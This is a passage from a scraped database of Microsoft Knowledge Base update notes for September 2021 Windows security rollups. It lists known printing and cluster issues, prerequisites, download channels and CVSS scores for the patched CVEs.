you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006736](<https://support.microsoft.com/help/5006736>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007263](<https://support.microsoft.com/help/5007263>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006736](<https://support.microsoft.com/help/5006736>). If after installing [KB5006736](<https://support.microsoft.com/help/5006736>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update](<https://www.microsoft.com/cloud-platform/extended-security-updates>) (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005606>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005606](<https://download.microsoft.com/download/1/4/7/147d3470-0e5e-48f9-888f-61e2094f4921/5005606.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005606 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005606", "href": "https://support.microsoft.com/en-us/help/5005606", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nWSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006715](<https://support.microsoft.com/help/5006715>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007246](<https://support.microsoft.com/help/5007246>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006715](<https://support.microsoft.com/help/5006715>). If after installing [KB5006715](<https://support.microsoft.com/help/5006715>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, we strongly recommend that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005618>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005618](<https://download.microsoft.com/download/6/f/0/6f091713-20f2-44a1-b92f-1b97061a9ac9/5005618.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005618 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005618", "href": "https://support.microsoft.com/en-us/help/5005618", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006728](<https://support.microsoft.com/help/5006728>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007233](<https://support.microsoft.com/help/5007233>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006728](<https://support.microsoft.com/help/5006728>). If after installing [KB5006728](<https://support.microsoft.com/help/5006728>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005615>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005615](<https://download.microsoft.com/download/9/0/1/9011f90e-86fb-404d-9847-0c430ac902ff/5005615.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005615 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005615", "href": "https://support.microsoft.com/en-us/help/5005615", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005076](<https://support.microsoft.com/help/5005076>) (released August 10, 2021) and addresses the following issues:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006714](<https://support.microsoft.com/help/5006714>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007247](<https://support.microsoft.com/help/5007247>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006714](<https://support.microsoft.com/help/5006714>). If after installing [KB5006714](<https://support.microsoft.com/help/5006714>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005613>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005613](<https://download.microsoft.com/download/f/5/d/f5d43c2c-eb5e-48d1-961f-367730a68333/5005613.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005613 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005613", "href": "https://support.microsoft.com/en-us/help/5005613", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:35", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only 